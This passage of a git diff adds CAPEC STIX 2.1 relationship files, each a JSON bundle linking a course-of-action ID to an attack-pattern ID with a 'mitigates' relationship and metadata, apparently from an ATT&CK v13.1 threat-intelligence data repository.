b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--04f00f04-9695-4b7c-9593-29b78e51dda7.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--87e7395b-9c1f-4368-9510-1505fce2da05", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04f00f04-9695-4b7c-9593-29b78e51dda7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8.json new file mode 100644 index 0000000000000000000000000000000000000000..3a4ccbf2aa9a13640178f487c92dc17d6918cf18 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--fb6b7038-d937-4f92-b788-1026efb0cd1e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05481c8c-ea7e-42e4-a012-87f4ecdeb7b8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3e6855e-8bae-4987-bb3d-398e16bb2502", + "spec_version": "2.1", + "target_ref": "attack-pattern--01d5c7e7-1c74-4b20-9e43-548c5f4de113", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--059701ef-8061-47b4-a433-8f83fe7a16ae.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--059701ef-8061-47b4-a433-8f83fe7a16ae.json new file mode 100644 index 0000000000000000000000000000000000000000..eb26d0ba4fbec9077dcc8931bc962d476feb60fc --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--059701ef-8061-47b4-a433-8f83fe7a16ae.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--8dadfe82-ed3b-4ea8-bd09-10cb82c71156", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--059701ef-8061-47b4-a433-8f83fe7a16ae", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--82858217-6c8b-48b3-950e-5d75c257b76d", + "spec_version": "2.1", + "target_ref": "attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792.json new file mode 100644 index 0000000000000000000000000000000000000000..16230472d81b6d8536f2c204205219e6a88fb70d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--967fdd29-35b2-41c9-ac45-02632a81fa28", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0e49c00-06b2-426e-a1dc-9aaeb4cafb97", + "spec_version": "2.1", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d.json new file mode 100644 index 0000000000000000000000000000000000000000..331cc9c13a384504462dec17376eeddc843ce5f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--8da8bfa4-5df2-47f6-8bc1-b591518f1b12", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97c0cee2-43b4-4e35-a822-c2af1fda128d", + "spec_version": "2.1", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3.json new file mode 100644 index 0000000000000000000000000000000000000000..9b72be2cc8ddd0f351102feceee2f8378731225e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--efc053ab-23dd-49d2-9c8f-e9bfaebca119", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05eb5a7f-c448-40a0-9891-f33a7d754ef3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7bd078cd-9dbf-44a2-9bd8-4f13425b385d", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0606876e-24f7-4cdd-812b-44db26e0f72b.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0606876e-24f7-4cdd-812b-44db26e0f72b.json new file mode 100644 index 0000000000000000000000000000000000000000..988e8c608b8cabe493cc1e303f27b44abbe75c3b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0606876e-24f7-4cdd-812b-44db26e0f72b.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--03c17ace-f581-4472-9d78-d03ef8b924ff", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0606876e-24f7-4cdd-812b-44db26e0f72b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--21b6aeac-6ff3-477a-a051-f59ad76116f4", + "spec_version": "2.1", + "target_ref": "attack-pattern--bfb6492a-7a88-47c4-aff9-2c8190265328", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9.json new file mode 100644 index 0000000000000000000000000000000000000000..b94542df3fe49c3914f0848f77f23a4193641d60 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--a67fba86-146e-466d-8351-4c5644c63b2b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--060fd8e7-cc86-47f8-b257-2e90a6935da9", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a.json new file mode 100644 index 0000000000000000000000000000000000000000..0a34773dd67356c76dd86b5c1e677f61e81a4d65 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--22a16bf0-1ba7-46bc-9499-b58b445e8d79", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06659f84-ed6a-4b74-8618-ed6de31ac40a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2a9a6199-3e7e-4a2d-960a-04abb1fec1e0", + "spec_version": "2.1", + "target_ref": "attack-pattern--da41d572-d779-44a8-b8bf-530f49c32861", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06d27c54-f604-4253-9b67-9e78cfe16886.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06d27c54-f604-4253-9b67-9e78cfe16886.json new file mode 100644 index 0000000000000000000000000000000000000000..89d391137fc5b37ce76f487fc84ebf800d928b93 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06d27c54-f604-4253-9b67-9e78cfe16886.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--83c84a72-905b-4a24-b32e-2ee75a8985fa", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06d27c54-f604-4253-9b67-9e78cfe16886", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ca9bac26-36eb-4576-996b-53f3e979c3ed", + "spec_version": "2.1", + "target_ref": "attack-pattern--f18ec51a-9ecd-49bf-9b91-5f5288306f70", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f.json new file mode 100644 index 0000000000000000000000000000000000000000..bf3cfe043204d91a1df05a5b90e7d765fca92a14 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--85550a93-4bc8-4688-8a7e-9c42f9b8b67a", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06da039c-0cd5-4ee7-a6e3-2c773096bb9f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--219ed2d5-238f-4286-a245-1c13e252cf24", + "spec_version": "2.1", + "target_ref": "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc.json new file mode 100644 index 0000000000000000000000000000000000000000..6c00b265c55027ee297c3a64d4a8e3d87ed4ca4e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--f6ca1d24-acf5-49e5-9932-b8d45062ab48", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dad09427-e3ef-43e9-8424-cfb6594bedb2", + "spec_version": "2.1", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696.json new file mode 100644 index 0000000000000000000000000000000000000000..7b081df565e9477a6e32f6b772460bd8dad73802 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--46cb291c-90f9-4f2d-8f1c-29674b56953a", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--07ae02b7-e3da-4e3d-bf8f-ed031fdf8696", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a689051-a57a-41f3-a56f-4caedb91d329", + "spec_version": "2.1", + "target_ref": "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053.json new file mode 100644 index 0000000000000000000000000000000000000000..b210bbe6643f6f6e75a1c4efedc22c783da41d77 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--676f9d3d-3ece-4e1c-9eeb-957801d9de7f", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0808991b-23f3-4e8e-84e2-910ad1d7c053", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "spec_version": "2.1", + "target_ref": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0809c5e1-86fc-4df6-8e5e-50939743e745.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0809c5e1-86fc-4df6-8e5e-50939743e745.json new file mode 100644 index 0000000000000000000000000000000000000000..9e0917116e6718d1e4df6a9cce13455b5cc0cf32 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0809c5e1-86fc-4df6-8e5e-50939743e745.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--5381cbd9-ba0c-426d-a4f3-160f6573f751", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0809c5e1-86fc-4df6-8e5e-50939743e745", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "spec_version": "2.1", + "target_ref": "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717.json new file mode 100644 index 0000000000000000000000000000000000000000..ea60050241f0fbe071b1bd1a5ffd69e367076ab4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--c5a5cd49-8868-49dc-bbe8-2fc279a3ceb8", + "objects": [ + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75.json new file mode 100644 index 0000000000000000000000000000000000000000..70428862ad8bf3a334506063ab113b96ff03577f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--6944167a-950c-48a6-8887-9fac5e4af4c9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0844ef97-7ee7-4611-8b3a-6da9146cce75", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f57e0c5f-4b65-49c5-a707-502f310762ed", + "spec_version": "2.1", + "target_ref": "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08999418-b2b2-438c-aa9b-95bf0933923b.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08999418-b2b2-438c-aa9b-95bf0933923b.json new file mode 100644 index 0000000000000000000000000000000000000000..8a08cbbd5ca898041230aff89252d18ad9ed428c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08999418-b2b2-438c-aa9b-95bf0933923b.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--356748cd-6be4-4bcd-be7e-dea7e81b65d5", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08999418-b2b2-438c-aa9b-95bf0933923b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--211fb4c0-38c1-4bfe-bb8e-b32e9baaf81c", + "spec_version": "2.1", + "target_ref": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6.json new file mode 100644 index 0000000000000000000000000000000000000000..6da59019257f3c15a95d44a1684db7759ec6a8af --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--636a5700-799b-4e48-b850-3dea624f7c6e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08d00fee-0899-4fb2-b349-7d5a12a13db6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a1f65809-af95-4549-8285-b7bac44a07b3", + "spec_version": "2.1", + "target_ref": "attack-pattern--2a8824eb-4fd0-45a4-9c3c-af3fd7c5e0ca", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9.json new file mode 100644 index 0000000000000000000000000000000000000000..b75dc05f87cb8a12f9aef403070a6f24a3d077e3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--f95e38cd-8224-4c5e-ae13-512cecf32240", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08d4d25a-ee13-4f19-b709-f7bbafb7d0d9", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5c4fb82-e889-429a-a343-f75a01e515dd", + "spec_version": "2.1", + "target_ref": "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08eeb157-8c84-4597-82fa-5def0ac9487f.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08eeb157-8c84-4597-82fa-5def0ac9487f.json new file mode 100644 index 0000000000000000000000000000000000000000..11174393c39f38fa261402089e93dd30b5f27d92 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--08eeb157-8c84-4597-82fa-5def0ac9487f.json 
@@ -0,0 +1,21 @@ +{ + "id": "bundle--35e8d949-619f-47ac-b286-e17d2370407e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08eeb157-8c84-4597-82fa-5def0ac9487f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f830ee1-2df0-423a-a566-4e75e0436eb5", + "spec_version": "2.1", + "target_ref": "attack-pattern--51cf3883-1993-49d1-a6c6-169cabf71adb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09188a1e-a0b1-4dd9-bd8f-743e97847140.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09188a1e-a0b1-4dd9-bd8f-743e97847140.json new file mode 100644 index 0000000000000000000000000000000000000000..0e9364a432357a4d44da925752aeb08f4d832913 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09188a1e-a0b1-4dd9-bd8f-743e97847140.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--876685ad-8770-4dd4-8ba9-cb7248747c51", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09188a1e-a0b1-4dd9-bd8f-743e97847140", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d05b5efb-6c41-4e16-ae25-d9f1c265cde9", + "spec_version": "2.1", + "target_ref": "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09525f40-2e8d-420d-a8ee-3893d36113a1.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09525f40-2e8d-420d-a8ee-3893d36113a1.json new file mode 100644 index 0000000000000000000000000000000000000000..c0252f82b9936b21f6617e712995ebb98cf7693a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--09525f40-2e8d-420d-a8ee-3893d36113a1.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--5fad1dbf-9068-4495-bae9-4dd539de6225", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--09525f40-2e8d-420d-a8ee-3893d36113a1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "spec_version": "2.1", + "target_ref": "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0989752b-6aa5-43c2-afc2-0873faa1782e.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0989752b-6aa5-43c2-afc2-0873faa1782e.json new file mode 100644 index 0000000000000000000000000000000000000000..3176998a03c272f1ede6930082fc447ced9a14af --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--0989752b-6aa5-43c2-afc2-0873faa1782e.json 
